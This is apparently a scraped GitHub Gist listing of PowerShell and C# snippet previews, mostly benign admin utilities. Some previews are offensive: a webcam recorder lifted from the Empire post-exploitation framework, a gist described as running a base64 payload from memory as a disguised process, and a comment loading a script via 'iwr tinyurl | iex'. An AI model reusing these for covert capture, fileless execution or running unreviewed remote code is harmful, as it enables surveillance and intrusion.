sassdawe
/ Update-FunctionsFromModule.ps1
Created
May 24, 2022 17:40
Turn a monolit PowerShell module into multiple files for easier editing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $module = "module name" | |
| $folder = "destination folder" | |
| (((Get-Module $module).ExportedFunctions).Values.GetEnumerator()) | Foreach-Object { | |
| "function $($_.Name) { `n $($_.definition)`n}" > "$folder\function-$($_.name).ps1" | |
| } |
sassdawe
/ Trace-AICommand.ps1
Created
May 23, 2022 12:00
— forked from JustinGrote/Trace-AICommand.ps1
Report the results and performance of any scriptblock to Azure Application Insights
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #requires -version 7 | |
| #You can load this script with $(iwr https://tinyurl.com/TraceAICommand | iex) | |
| using namespace Microsoft.ApplicationInsights | |
| using namespace Microsoft.ApplicationInsights.Extensibility | |
| using namespace Microsoft.ApplicationInsights.DataContracts | |
| using namespace System.Management.Automation | |
| using namespace System.Collections.Generic | |
| using namespace System.Net | |
| #Reference: https://docs.microsoft.com/en-us/azure/azure-monitor/app/console |
sassdawe
/ webcam.ps1
Created
April 19, 2022 19:06
— forked from quantumcore/webcam.ps1
Powershell Script to Record Webcam and output the .AVI file to a base64 file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Taken from : https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/collection/WebcamRecorder.py | |
| function Start-WebcamRecorder | |
| { | |
| <# | |
| .SYNOPSIS | |
| This function utilizes the DirectX and DShowNET assemblies to record video from the host's webcam. | |
| Author: Chris Ross (@xorrior) | |
| License: BSD 3-Clause | |
| .DESCRIPTION | |
| This function will capture video output from the hosts webcamera. Note that if compression is available, there isn't |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Protect-FromMyself { | |
| <# | |
| .SYNOPSIS | |
| Protect-FromMyself | |
| .DESCRIPTION | |
| Protect-FromMyself will turn on `-WhatIf` for all comdlets that support it. To help protect against accidental changes. | |
| .NOTES | |
| .LINK | |
| #> | |
| [CmdletBinding()] |
sassdawe
/ Get-LatestLTS.ps1
Created
February 12, 2022 22:32
Get the latest LTS version of PowerShell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .Synopsis | |
| Get-LatestLTS | |
| .DESCRIPTION | |
| Long description | |
| .EXAMPLE | |
| Example of how to use this cmdlet | |
| .EXAMPLE | |
| Another example of how to use this cmdlet |
sassdawe
/ bytearray2exe.cs
Created
October 22, 2021 18:58
— forked from decay88/bytearray2exe.cs
Execute base64 encoded byte array from memory without wrting to disk as a disguised process
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Collections.Generic; | |
| using System.Linq; | |
| using System.Text; | |
| using System.Threading.Tasks; | |
| using System.Runtime.InteropServices; | |
| namespace ByteArrayExec | |
| { |
sassdawe
/ New-AzureADTestUser.ps1
Last active
August 9, 2022 07:31
Create random Azure AD Test users
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .Synopsis | |
| New-AzureADTestUser | |
| .DESCRIPTION | |
| New-AzureADTestUser will create one or more random Azure AD test account(s). | |
| The randomness is achieved using https://randomuser.me/api/. | |
| The account(s) will be disabled, and the password(s) will be a random Guid. | |
| .EXAMPLE |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function clear-url { | |
| [cmdletbinding()] | |
| [alias('cc')] | |
| param( | |
| [string]$url = @(Get-Clipboard)[0] | |
| ) | |
| $url = $url.Trim() | |
| Write-Verbose "original url: `'$url`'" | |
| if ( ([uri]$url).Query ) { | |
| Write-Verbose "removing: `'$(([uri]$url).Query)`'" |
sassdawe
/ Debug-PowerShell.ps1
Created
July 25, 2021 12:36
Debug in PowerShell with rolling log file
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Function Debug-PowerShell() { | |
| [CmdletBinding()] | |
| [Alias("dbps")] | |
| param ( | |
| [string]$Path = "$ENV:TEMP\psdebu.log" | |
| ) | |
| $Global:DebugLog = $Path | |
| New-Item $Global:DebugLog -Force -ItemType File | |
| Start-Process powershell -ArgumentList "-noprofile","-command &{Get-Content '$DebugLog' -Wait}" | |
| } |
sassdawe
/ defenderwatch.ps1
Created
June 7, 2021 05:32
— forked from svch0stz/defenderwatch.ps1
WMI Watcher for Windows Defender RealtimeMonitoring
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $WMI = @{ | |
| Query = "SELECT * FROM __InstanceModificationEvent WITHIN 5 WHERE TargetInstance ISA 'MSFT_MpPreference' AND TargetInstance.DisableRealtimeMonitoring=True" | |
| Action = { | |
| #$Global:Data = $Event | |
| Write-Host "Defender Configuration change - DisableRealtimeMonitoring:"$Event.SourceEventArgs.NewEvent.TargetInstance.DisableRealtimeMonitoring"(Old Value:"$Event.SourceEventArgs.NewEvent.PreviousInstance.DisableRealtimeMonitoring")" | |
| } | |
| Namespace = 'root\microsoft\windows\defender' | |
| SourceIdentifier = "Defender.DisableRealtimeMonitoring" | |
| } | |
| $Null = Register-WMIEvent @WMI |